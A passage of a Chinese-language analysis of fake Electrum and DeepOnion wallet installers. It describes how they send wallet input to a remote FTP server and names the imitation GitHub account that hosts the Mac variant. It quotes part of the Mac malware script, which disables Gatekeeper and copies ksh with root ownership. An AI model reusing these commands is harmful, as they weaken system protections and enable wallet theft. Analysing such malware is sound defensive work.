(11)网络行为 行为描述: 建立到一个指定的套接字连接 详情信息: IP:**.138.40.**:128, SOCKET = 0x000001d0 IP:**.138.40.**:128, SOCKET = 0x000001cc 我们测试打开,自解压 : 结果发现用于上传本地用户信息的 FTP 账号密码,同时有一个正常的 Electrum Installer 文件,一旦用户安装后使用, 在 Electrum 下输入的敏感信息将被发送到远程恶意 FTP 服务器接收。 2020 年 06 月 02 日 开始,已经有用户陆续中招。 2.Mac 端 (1)安装命令: (2)脚本内容: (3)恶意地址:https://github.com/deep-onion (模仿 知名项目 的 Github 地址 ) 恶意地址下也有两个项目: deep-onion.github.io wallet https://github.com/deep-onion/deep-onion.github.io 此文件此处不做分析。 (4) Mac 端 https://github.com/deep-onion/wallet 恶意文件是 DeepOnion 执行恶意脚本后是一系列恶意操作, 如: try { shell_exec("spctl --master-disable"); $ksh = trim(shell_exec("which ksh")); shell_exec("cp $ksh $homedir/.ksh"); shell_exec("cd $homedir && chown root:wheel . (责任编辑:admin1) |